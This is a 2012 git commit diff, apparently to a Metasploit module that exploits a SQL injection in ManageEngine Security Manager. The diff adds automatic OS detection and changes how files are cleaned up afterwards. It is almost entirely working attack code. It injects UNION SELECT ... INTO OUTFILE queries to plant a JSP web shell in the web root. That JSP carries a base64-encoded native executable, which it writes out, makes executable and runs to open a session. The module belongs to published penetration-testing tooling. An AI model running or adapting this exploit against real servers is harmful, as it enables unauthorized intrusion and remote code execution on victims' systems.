Add auto-target, and some changes to cleanup

sinn3r · sinn3r · commit 90542547c6d5 · 2012-10-23T19:07:13.000-05:00
diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb
@@ -34,11 +34,14 @@ def initialize(info={})
 					['EDB','22094'],
 					['BID', '56138']
 				],
+			'Platform'       => ['win', 'linux'],
 			'Targets'        =>
 				[
-					['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win'   }],
-					['Linux',   { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
+					['Automatic', {}],
+					['Windows',   { 'Arch' => ARCH_X86, 'Platform' => 'win'   }],
+					['Linux',     { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
 				],
+			'DefaultTarget'  => 0,
 			'Privileged'     => false,
 			'DisclosureDate' => "Oct 18 2012"))
 
@@ -63,9 +66,39 @@ def check
 	end
 
 
+	def pick_target
+		return target if target.name != 'Automatic'
+
+		rnd_num   = Rex::Text.rand_text_numeric(1)
+		rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
+		outpath   = "../../webapps/SecurityManager/#{rnd_fname}"
+
+		@clean_ups << outpath
+
+		sqli  = "#{rnd_num})) union select @@version,"
+		sqli << (2..28).map {|e| e} * ","
+		sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
+		sqli_exec(sqli)
+
+		res = send_request_raw({'uri'=>"/#{rnd_fname}"})
+
+		# Linux   = 5.0.36-enterprise
+		# Windows = 5.0.36-enterprise-nt
+
+		if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/
+			print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}")
+			return targets[1]  # Windows target
+		elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/
+			print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}")
+			return targets[2]
+		end
+
+		return nil
+	end
+
+
 	#
-	# Remove the JSP once we get a shell.
-	# We cannot delete the executable because it will still be in use.
+	# We're in SecurityManager/bin at this point
 	#
 	def on_new_session(cli)
 		if target['Platform'] == 'linux'
@@ -77,20 +110,23 @@ def on_new_session(cli)
 		end
 
 		begin
-			path = "../webapps/SecurityManager/#{@jsp_name + '.jsp'}"
-			print_warning("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}")
-
-			if cli.type == 'meterpreter'
-				cli.fs.file.rm(path)
-			else
-				del_cmd = (target['Platform'] == 'linux') ? 'rm' : 'del'
-				path = path.gsub(/\//, '\\') if target['Platform'] == 'win'
-				cli.shell_command_token("#{del_cmd} \"#{path}\"")
-			end
-
-			print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted")
+			@clean_ups.each { |f|
+				base = File.basename(f)
+				f = "../webapps/SecurityManager/#{base}"
+				print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"")
+
+				if cli.type == 'meterpreter'
+					cli.fs.file.rm(f)
+				else
+					del_cmd = (@my_target['Platform'] == 'linux') ? 'rm' : 'del'
+					f = f.gsub(/\//, '\\') if @my_target['Platform'] == 'win'
+					cli.shell_command_token("#{del_cmd} \"#{f}\"")
+				end
+
+				print_good("#{rhost}:#{rport} - \"#{base}\" deleted")
+			}
 		rescue ::Exception => e
-			print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}")
+			print_error("Unable to delete: #{e.message}")
 		end
 	end
 
@@ -99,9 +135,10 @@ def on_new_session(cli)
 	# Embeds our executable in JSP
 	#
 	def generate_jsp_payload
-		native_payload      = Rex::Text.encode_base64(generate_payload_exe)
+		opts                = {:arch => @my_target.arch, :platform => @my_target.platform}
+		native_payload      = Rex::Text.encode_base64(generate_payload_exe(opts))
 		native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3)
-		ext                 = (target['Platform'] == 'win') ? '.exe' : '.bin'
+		ext                 = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
 
 		var_raw     = Rex::Text.rand_text_alpha(rand(8) + 3)
 		var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
@@ -111,7 +148,7 @@ def generate_jsp_payload
 		var_path    = Rex::Text.rand_text_alpha(rand(8) + 3)
 		var_proc2   = Rex::Text.rand_text_alpha(rand(8) + 3)
 
-		if target['Platform'] == 'linux'
+		if @my_target['Platform'] == 'linux'
 			var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
 			chmod = %Q|
 			Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
@@ -161,14 +198,7 @@ def generate_jsp_payload
 		jsp.unpack("H*")[0]
 	end
 
-
-	#
-	# Run the actual exploit
-	#
-	def inject_exec
-		# Inject our JSP payload
-		hex_jsp = generate_jsp_payload
-
+	def sqli_exec(sqli_string)
 		cookie  = 'STATE_COOKIE=&'
 		cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
 		cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
@@ -180,14 +210,9 @@ def inject_exec
 		cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
 		cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'
 
-		rnd_num = Rex::Text.rand_text_numeric(1)
-		sqli  = "#{rnd_num})) union select 0x#{hex_jsp},"
-		sqli << (2..28).map {|e| e} * ","
-		sqli << " into outfile #{@outpath} FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
-
 		state_id = Rex::Text.rand_text_numeric(5)
-		print_status("#{rhost}:#{rport} - Sending JSP payload")
-		res = send_request_cgi({
+
+		send_request_cgi({
 			'method'    => 'POST',
 			'uri'       => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
 			'headers'   => {
@@ -202,13 +227,28 @@ def inject_exec
 				'ANDOR'       => 'and',
 				'condition_1' => 'OpenPorts@PORT',
 				'operator_1'  => 'IN',
-				'value_1'     => sqli,
+				'value_1'     => sqli_string,
 				'COUNT'       => '1'
 			}
 		})
+	end
+
+	#
+	# Run the actual exploit
+	#
+	def inject_exec(out)
+		hex_jsp = generate_jsp_payload
+		rnd_num = Rex::Text.rand_text_numeric(1)
+		sqli  = "#{rnd_num})) union select 0x#{hex_jsp},"
+		sqli << (2..28).map {|e| e} * ","
+		sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
+
+		print_status("#{rhost}:#{rport} - Sending JSP payload")
+		sqli_exec(sqli)
 
-		print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}")
-		send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"})
+		fname = "/#{File.basename(out)}"
+		print_status("#{rhost}:#{rport} - Requesting #{fname}")
+		res = send_request_raw({'uri' => fname})
 
 		handler
 	end
@@ -218,9 +258,19 @@ def inject_exec
 	# The server must start first, and then we send the malicious requests
 	#
 	def exploit
-		@jsp_name = rand_text_alpha(rand(6)+3)
-		@outpath  = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
+		@clean_ups = []
+
+		@my_target = pick_target
+		if @my_target.nil?
+			print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
+			return
+		end
+
+		jsp_name  = rand_text_alpha(rand(6)+3)
+		outpath   = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"
+
+		@clean_ups << outpath
 
-		inject_exec
+		inject_exec(outpath)
 	end
 end
